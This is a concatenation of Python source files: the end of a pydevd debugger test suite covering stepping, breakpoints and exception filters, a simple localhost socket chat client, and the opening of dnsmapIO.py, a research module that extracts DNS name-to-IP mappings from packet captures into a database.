# Don't call super as we have an expected exception
assert 'ValueError: TEST SUCEEDED' in stderr
with case_setup_remote.test_file(
'_debugger_case_remote_unhandled_exceptions2.py',
additional_output_checks=additional_output_checks,
check_test_suceeded_msg=check_test_suceeded_msg,
EXPECTED_RETURNCODE=1) as writer:
writer.log.append('making initial run')
writer.write_make_initial_run()
check_scenario(writer)
writer.log.append('finished ok')
writer.finished_ok = True
@pytest.mark.parametrize('filename, break_at_lines', [
# Known limitation: when a breakpoint is added to the first line of the module, the
# whole module becomes traced.
('_debugger_case_tracing.py', {2: 'trace'}),
('_debugger_case_tracing.py', {3: 'frame_eval'}),
('_debugger_case_tracing.py', {4: 'frame_eval'}),
('_debugger_case_tracing.py', {2: 'trace', 4: 'trace'}),
('_debugger_case_tracing.py', {8: 'frame_eval'}),
('_debugger_case_tracing.py', {9: 'frame_eval'}),
('_debugger_case_tracing.py', {10: 'frame_eval'}),
# Note: second frame eval hit is actually a trace because after we
# hit the first frame eval we don't actually stop tracing a given
# frame (known limitation to be fixed in the future).
# -- needs a better test
('_debugger_case_tracing.py', {8: 'frame_eval', 10: 'frame_eval'}),
])
def test_frame_eval_limitations(case_setup, filename, break_at_lines):
'''
Test with limitations to be addressed in the future.
'''
with case_setup.test_file(filename) as writer:
for break_at_line in break_at_lines:
writer.write_add_breakpoint(break_at_line)
writer.log.append('making initial run')
writer.write_make_initial_run()
for break_at_line, break_mode in break_at_lines.items():
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
if IS_PY36_OR_GREATER and TEST_CYTHON:
assert hit.suspend_type == break_mode
else:
# Before 3.6 frame eval is not available.
assert hit.suspend_type == 'trace'
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_step_return_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_return_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_RETURN_MY_CODE)
assert hit.name == '<module>'
writer.write_step_return_my_code(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code(case_setup):
with case_setup.test_file('my_code/my_code.py') as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback1'
writer.write_step_in_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO_MY_CODE)
assert hit.name == 'callback2'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE) # Note: goes from step over to step into
assert hit.name == 'callback1'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE) # Note: goes from step over to step into
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_OVER_MY_CODE)
assert hit.name == '<module>'
writer.write_step_over_my_code(hit.thread_id)
writer.finished_ok = True
@pytest.fixture(
params=[
'step_over',
'step_return',
'step_in',
]
)
def step_method(request):
return request.param
def test_sysexit_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/_debugger_case_sysexit.py': True})})
return env
with case_setup.test_file('_debugger_case_sysexit.py', get_environ=get_environ, EXPECTED_RETURNCODE=1) as writer:
writer.write_add_exception_breakpoint_with_policy(
'SystemExit',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.parametrize("scenario", [
'handled_once',
'handled_multiple',
'unhandled',
])
def test_exception_not_on_filtered_file(case_setup, scenario):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
if scenario == 'handled_once':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'handled_multiple':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
elif scenario == 'unhandled':
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=0,
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
for _i in range(3 if scenario == 'handled_multiple' else 1):
hit = writer.wait_for_breakpoint_hit(
REASON_UNCAUGHT_EXCEPTION if scenario == 'unhandled' else REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_exception_on_filtered_file(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({'PYDEVD_FILTERS': json.dumps({'**/other.py': True})})
return env
def check_test_suceeded_msg(writer, stdout, stderr):
return 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise RuntimeError' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'my_code/my_code_exception_on_other.py',
get_environ=get_environ,
EXPECTED_RETURNCODE='any',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
) as writer:
writer.write_add_exception_breakpoint_with_policy(
'RuntimeError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=1,
ignore_libraries=0
)
writer.write_make_initial_run()
# Note: the unhandled exception was initially raised in a file which is filtered out, but we
# should be able to see the frames which are part of the project.
hit = writer.wait_for_breakpoint_hit(
REASON_UNCAUGHT_EXCEPTION,
file='my_code_exception_on_other.py',
line=writer.get_line_index_with_content('other.raise_exception()')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize("environ", [
{'PYDEVD_FILTER_LIBRARIES': '1'}, # Global setting for step over
{'PYDEVD_FILTERS': json.dumps({'**/other.py': True})}, # specify as json
{'PYDEVD_FILTERS': '**/other.py'}, # specify ';' separated list
])
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython.')
def test_step_over_my_code_global_settings(case_setup, environ, step_method):
def get_environ(writer):
env = os.environ.copy()
env.update(environ)
return env
def do_step():
if step_method == 'step_over':
writer.write_step_over(hit.thread_id)
return REASON_STEP_OVER # Note: goes from step over to step into
elif step_method == 'step_return':
writer.write_step_return(hit.thread_id)
return REASON_STEP_RETURN
else:
assert step_method == 'step_in'
writer.write_step_in(hit.thread_id)
return REASON_STEP_INTO
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback1'
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'callback2'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == 'callback1'
stop_reason = do_step()
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
if IS_JYTHON:
# Jython may get to exit functions, so, just resume the thread.
writer.write_run_thread(hit.thread_id)
else:
stop_reason = do_step()
if step_method != 'step_return':
stop_reason = do_step()
if step_method == 'step_over':
stop_reason = REASON_STEP_OVER
hit = writer.wait_for_breakpoint_hit(reason=stop_reason)
assert hit.name == '<module>'
writer.write_step_over(hit.thread_id)
writer.finished_ok = True
def test_step_over_my_code_global_setting_and_explicit_include(case_setup):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
# specify as json (force include).
'PYDEVD_FILTERS': json.dumps({'**/other.py': False})
})
return env
with case_setup.test_file('my_code/my_code.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
# Although we filtered out non-project files, other.py is explicitly included.
assert hit.name == 'call_me_back1'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_access_token(case_setup):
def update_command_line_args(self, args):
args.insert(2, '--access-token')
args.insert(3, 'bar123')
args.insert(2, '--client-access-token')
args.insert(3, 'foo234')
return args
with case_setup.test_file('_debugger_case_print.py', update_command_line_args=update_command_line_args) as writer:
writer.write_add_breakpoint(1, 'None') # I.e.: should not work (not authenticated).
writer.wait_for_message(lambda msg:'Client not authenticated.' in msg, expect_xml=False)
writer.write_authenticate(access_token='bar123', client_access_token='foo234')
writer.write_version()
writer.write_make_initial_run()
writer.finished_ok = True
def test_namedtuple(case_setup):
'''
Check that we don't step into <string> in the namedtuple constructor.
'''
with case_setup.test_file('_debugger_case_namedtuple.py') as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
expected_line = line
for _ in range(2):
expected_line += 1
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO, file='_debugger_case_namedtuple.py', line=expected_line)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_matplotlib_activation(case_setup):
try:
import matplotlib
except ImportError:
return
def get_environ(writer):
env = os.environ.copy()
env.update({
'IPYTHONENABLE': 'True',
})
return env
with case_setup.test_file('_debugger_case_matplotlib.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
for _ in range(3):
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
_GENERATOR_FILES = [
'_debugger_case_generator3.py',
]
if not IS_PY2:
_GENERATOR_FILES.append('_debugger_case_generator.py')
_GENERATOR_FILES.append('_debugger_case_generator2.py')
@pytest.mark.parametrize('target_filename', _GENERATOR_FILES)
@pytest.mark.skipif(IS_JYTHON, reason='We do not detect generator returns on Jython.')
def test_generator_step_over_basic(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
        # Note: not using a for loop so that we know which step failed in the CI if it fails.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 1')
)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 2')
)
if IS_PY38_OR_GREATER and target_filename == '_debugger_case_generator2.py':
# On py 3.8 it goes back to the return line.
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('return \\')
)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 3')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize('target_filename', _GENERATOR_FILES)
@pytest.mark.skipif(IS_JYTHON, reason='We do not detect generator returns on Jython.')
def test_generator_step_return(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
        # Note: not using a for loop so that we know which step failed in the CI if it fails.
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_RETURN,
file=target_filename,
line=writer.get_line_index_with_content('generator return')
)
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step 3')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_stepin_not_my_code_coroutine(case_setup):
def get_environ(writer):
environ = {'PYDEVD_FILTERS': '{"**/not_my_coroutine.py": true}'}
env = os.environ.copy()
env.update(environ)
return env
with case_setup.test_file('my_code/my_code_coroutine.py', get_environ=get_environ) as writer:
writer.write_set_project_roots([debugger_unittest._get_debugger_test_file('my_code')])
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(reason=REASON_STEP_INTO)
assert hit.name == 'main'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython')
def test_generator_step_in(case_setup):
with case_setup.test_file('_debugger_case_generator_step_in.py') as writer:
line = writer.get_line_index_with_content('stop 1')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
for i in range(2, 5):
writer.write_step_in(hit.thread_id)
kwargs = {}
if not IS_JYTHON:
kwargs['line'] = writer.get_line_index_with_content('stop %s' % (i,))
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO,
file='_debugger_case_generator_step_in.py',
**kwargs
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_over_basic(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break main')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
file=target_filename,
line=writer.get_line_index_with_content('step main')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_over_end_of_function(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break count 2')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_OVER,
name=('sleep', 'wait_task_rescheduled'),
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_in(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break count 1')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_RETURN,
file=target_filename,
line=writer.get_line_index_with_content('break main')
)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_INTO,
name=('sleep', 'wait_task_rescheduled'),
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.parametrize(
'target_filename',
[
'_debugger_case_asyncio.py',
'_debugger_case_trio.py',
]
)
@pytest.mark.skipif(not IS_CPYTHON or not IS_PY36_OR_GREATER, reason='Only CPython 3.6 onwards')
def test_asyncio_step_return(case_setup, target_filename):
with case_setup.test_file(target_filename) as writer:
line = writer.get_line_index_with_content('break count 1')
writer.write_add_breakpoint(line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_step_return(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
reason=REASON_STEP_RETURN,
file=target_filename,
line=writer.get_line_index_with_content('break main')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
# Jython needs some vars to be set locally.
# set JAVA_HOME=c:\bin\jdk1.8.0_172
# set PATH=%PATH%;C:\bin\jython2.7.0\bin
# set PATH=%PATH%;%JAVA_HOME%\bin
# c:\bin\jython2.7.0\bin\jython.exe -m py.test tests_python
if __name__ == '__main__':
pytest.main(['-k', 'test_case_12'])
|
client.py
|
import socket
import threading
username = raw_input("UserName : ")
#socket initialization, IPv4 protocol domain, TCP communication type
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#connecting client to server
client.connect(('127.0.0.1', 7976))
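# Protocol (as implied by the code below): right after a client connects, the
# server sends the literal string 'UserName'; the client replies with its
# name, and every other payload received is printed as a chat message.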
def receive():
while True:
        # receive loop: read messages from the server
try:
message = client.recv(1024).decode('ascii')
if message == 'UserName':
client.send(username.encode('ascii'))
else:
print(message)
except:
            # connection failed or was closed (e.g. wrong IP/port details)
            print("An error occurred!")
client.close()
break
#message layout
def write():
while True:
message = '{}: {}'.format(username, raw_input(''))
client.send(message.encode('ascii'))
#receiving multiple messages
receive_thread = threading.Thread(target=receive)
receive_thread.start()
#sending messages
write_thread = threading.Thread(target=write)
write_thread.start()
|
dnsmapIO.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2014, FTW Forschungszentrum Telekommunikation Wien
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of FTW nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL FTW
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import sys
import time
import Queue
import multiprocessing as mp
import socket
import base64
import re
import sqlite3
from os.path import getsize as file_getsize
import gzip
# import netaddr
import netaddr
import pcap
import dpkt
from netaddr import IPAddress
import progressbar
INPUTMODE_FIFO=1
INPUTMODE_PROTOBUF=2
INPUTMODE_PCAP_FILE=3
INPUTMODE_PCAP_IF=4
DNS_RECORD_TYPES_={
1: 'DNS_A',
2: 'DNS_NS',
3: 'DNS_MD',
4: 'DNS_MF',
5: 'DNS_CNAME',
6: 'DNS_SOA',
7: 'DNS_MB',
8: 'DNS_MG',
9: 'DNS_MR',
10: 'DNS_NULL_RR',
11: 'DNS_WKS',
12: 'DNS_PTR',
13: 'DNS_HINFO',
14: 'DNS_MINFO',
15: 'DNS_MX',
16: 'DNS_TXT',
17: 'DNS_RP',
18: 'DNS_AFSDB',
19: 'DNS_X25',
20: 'DNS_ISDN',
21: 'DNS_RT',
22: 'DNS_NSAP',
23: 'DNS_NSAP_PTR',
24: 'DNS_SIG',
25: 'DNS_KEY',
26: 'DNS_PX',
27: 'DNS_GPOS',
28: 'DNS_AAAA',
29: 'DNS_LOC',
30: 'DNS_NXT',
31: 'DNS_EID',
32: 'DNS_NIMLOC',
33: 'DNS_SRV',
34: 'DNS_ATMA',
35: 'DNS_NAPTR',
36: 'DNS_KX',
37: 'DNS_CERT',
38: 'DNS_A6',
39: 'DNS_DNAME',
40: 'DNS_SINK',
41: 'DNS_OPT',
42: 'DNS_APL',
43: 'DNS_DS',
44: 'DNS_SSHFP',
45: 'DNS_IPSECKEY',
46: 'DNS_RRSIG',
47: 'DNS_NSEC',
48: 'DNS_DNSKEY',
49: 'DNS_DHCID',
50: 'DNS_NSEC3',
51: 'DNS_NSEC3PARAM',
55: 'DNS_HIP',
56: 'DNS_NINFO',
57: 'DNS_RKEY',
99: 'DNS_SPF',
100: 'DNS_UINFO',
101: 'DNS_UID',
102: 'DNS_GID',
103: 'DNS_UNSPEC',
249: 'DNS_TKEY',
250: 'DNS_TSIG',
251: 'DNS_IXFR',
252: 'DNS_AXFR',
253: 'DNS_MAILB',
254: 'DNS_MAILA',
255: 'DNS_ALL',
32768: 'DNS_TA',
32769: 'DNS_DLV',
65535: 'DNS_UNKNOWN'
}
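# checkMapping keeps a dname -> set(IP) cache in 'dic' and returns only the
# IPs that are new for that name (or None when nothing changed); e.g. a
# repeated 'example.com' -> 192.0.2.1 answer is suppressed until the caller
# clears the cache.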
def checkMapping(dic, dname, ips):
newIps = set()
newMapping = False
if dname in dic: #partially or totally mapped?
for ip in ips:
if ip in dic[dname]: #totally mapped
continue
else:
newIps.add(ip) #partially mapped --> new mapping
dic[dname].add(ip)
newMapping = True
if newMapping:
return newIps
else:
return None
else: #new mapping
newIps = set(ips)
dic[dname] = newIps
return newIps
def dumpToDatabase(curs, timestamp, fqdn, ips, clientID, table):
for ip in ips:
sql = "INSERT INTO %s" % table
sql += " (timestamp, fqdn, ip, clientID) values (%s, %s, %s, %s)"
curs.execute(sql, (timestamp, fqdn, int(ip), clientID))
# alternative, works for sqlite only
#curs.execute("INSERT INTO dnsmappings(timestamp, fqdn, ip) VALUES(?,?,?)", (timestamp, fqdn, int(ip)))
def pcapReader(q, exitSignal, infile=None, interface=None, thrsh=0):
if not infile and not interface:
# FIXME: write warning here
return
# open the file
if infile:
pc=pcap.pcapObject()
try:
pc.open_offline(infile)
except IOError:
#log("could not open pcap interface "+str(input_interface)+"\n")
pass
if interface:
pc=pcap.pcapObject()
try:
#pc.open_live(interface, snaplen, promisc, read_timeout)
pc.open_live(interface, 1600, 0, 100)
except IOError:
#log("could not open pcap interface "+str(input_interface)+"\n")
pass
except Exception:
# most likely we got no permission to open the interface
sys.stderr.write('could not open interface. insufficient '
'permissions?\n')
q.put(None)
return
pc.setfilter('udp', 0, 0)
    basets=0
    newMappings=dict()
    # back-off parameters for the Queue.Full handler below (these were not
    # initialized in this function and caused a NameError when the queue filled up)
    sleeptime=0.5
    maxSleeptime=1.0
while True:
if exitSignal.is_set():
break
try:
packet=pc.next()
if not packet:
if infile:
# end of file
break
elif interface:
# read timeout
continue
payload=packet[1]
timestamp=int(packet[2])
# make sure we are dealing with IP traffic
# ref: http://www.iana.org/assignments/ethernet-numbers
try: eth = dpkt.ethernet.Ethernet(payload)
except: continue
if eth.type != 2048: continue
# make sure we are dealing with UDP
# ref: http://www.iana.org/assignments/protocol-numbers/
try: ip = eth.data
except: continue
if ip.p != 17: continue
# filter on UDP assigned ports for DNS
# ref: http://www.iana.org/assignments/port-numbers
try: udp = ip.data
except: continue
if udp.sport != 53 and udp.dport != 53: continue
# make the dns object out of the udp data and check for it being a RR (answer)
# and for opcode QUERY (I know, counter-intuitive)
try: dns = dpkt.dns.DNS(udp.data)
except: continue
if dns.qr != dpkt.dns.DNS_R: continue
if dns.opcode != dpkt.dns.DNS_QUERY: continue
if dns.rcode != dpkt.dns.DNS_RCODE_NOERR: continue
if len(dns.an) < 1: continue
if len(dns.qd) == 0: continue
aRecords=set()
queriedName=dns.qd[0].name
if not '.' in queriedName:
continue
#lastCname=queriedName
ttl = 0 # default value 0
for answer in dns.an:
"""
FIXME: this doesn't work for multiple queries in one DNS packet
"""
#if answer.type == dpkt.dns.DNS_CNAME:
# lastCname=answer.cname
if answer.type == dpkt.dns.DNS_A:
ip_temp=socket.inet_ntoa(answer.rdata)
try:
addr=IPAddress(ip_temp)
ttl = answer.ttl;
except netaddr.AddrFormatError:
continue
else:
if (addr.is_unicast() and
not addr.is_private() and
not addr.is_reserved() and
not addr.is_loopback()):
aRecords.add(addr)
if thrsh:
if (timestamp-basets) > thrsh:
basets = timestamp
newMappings.clear()
newIps = checkMapping(newMappings, queriedName, aRecords)
aRecords=newIps
if not aRecords:
continue
# data = ((queriedName, ip.dst, aRecords), timestamp)
data = ((queriedName, socket.inet_ntoa(ip.dst), aRecords,ttl), timestamp)
# print ip.dst;
# print socket.inet_ntoa(ip.dst);
queued=False
while not queued:
try:
q.put_nowait(data)
except Queue.Full:
# we saturated the queue, let's give the reading
# process some time to empty it again, where we don't
# try to put something in the queue and thereby lock it
# continuously
time.sleep(sleeptime)
if q.empty():
sleeptime*=0.5
elif q.qsize() >= q._maxsize:
sleeptime*=2
if sleeptime>maxSleeptime:
sleeptime=maxSleeptime
else:
queued=True
except KeyboardInterrupt:
break
"""
send shutdown signal
"""
q.put(None)
def protobufReader(infile, q, exitSignal, thrsh=0, useProgressbar=True):
"""
not implemented
"""
pass
def fifoReader(infile, q, exitSignal):
sleeptime=0.5
maxSleeptime=1.0
while True:
try:
if exitSignal.is_set(): break
line=infile.readline()
if not line:
time.sleep(1)
continue
if line=='ENDOFFILE':
break
try:
spl=line.split()
timestamp, queriedName, clientID, ipv4 = spl
except:
continue
else:
if not '.' in queriedName:
continue
try:
addr=IPAddress(ipv4)
except netaddr.AddrFormatError:
continue
else:
if (addr.is_unicast() and
not addr.is_private() and
not addr.is_reserved() and
not addr.is_loopback()):
try:
timestamp=int(timestamp)
except ValueError:
continue
else:
data = ((queriedName, clientID, [addr]),
timestamp)
queued=False
while not queued:
try:
q.put_nowait(data)
except Queue.Full:
# we saturated the queue, let's give the reading
# process some time to empty it again, where we don't
# try to put something in the queue and thereby lock it
# continuously
time.sleep(sleeptime)
if q.empty():
sleeptime*=0.5
elif q.qsize() >= q._maxsize:
sleeptime*=2
if sleeptime>maxSleeptime:
sleeptime=maxSleeptime
else:
queued=True
except KeyboardInterrupt:
break
q.put(None)
def fakeMappingGenerator(filename):
with open(filename, 'r') as f:
for line in f:
"""
expect format <timestamp> <fqdn> <IP>
"""
sline=line.split()
timestamp=int(sline[0])
fqdn=sline[1]
ip=IPAddress(sline[2])
yield (timestamp, fqdn, ip)
class recGen(object):
def __init__(self, inputSource, mode, gzippedInput=False, thrsh=0,
useProgressbar=True, dbfile=None, dbserver=None):
"""
mode:
1: read from fifo
2: read from protobuf file
3: read from pcap file
4: read from pcap interface
dbfile: a filename to create an SQLite database containing the
processed NOERROR queries
dbserver: a tuple (serverIP, dbuser, dbpass, dbname) specifying a MYSQL
database for storing the processed NOERROR queries
returns (ticket_dns object, timestamp)
if thrsh==0: don't filter
else: filter every thrsh seconds
"""
self.mode=mode
self.inputSource=inputSource
self.gzippedInput=gzippedInput
self.thrsh=thrsh
self.useProgressbar=useProgressbar
self.dbfile=dbfile
self.dbserver=dbserver
self.dbtable='dnsmappings'
self.infile=None
def __enter__(self):
if (self.mode==INPUTMODE_FIFO or self.mode==INPUTMODE_PROTOBUF or
self.mode==INPUTMODE_PCAP_FILE):
if self.inputSource=='-':
self.infile = sys.stdin
else:
if self.gzippedInput:
self.infile=gzip.GzipFile(self.inputSource)
else:
self.infile = open(self.inputSource, 'rb')
if self.dbfile:
self.conn=sqlite3.connect(self.dbfile)
self.curs=self.conn.cursor()
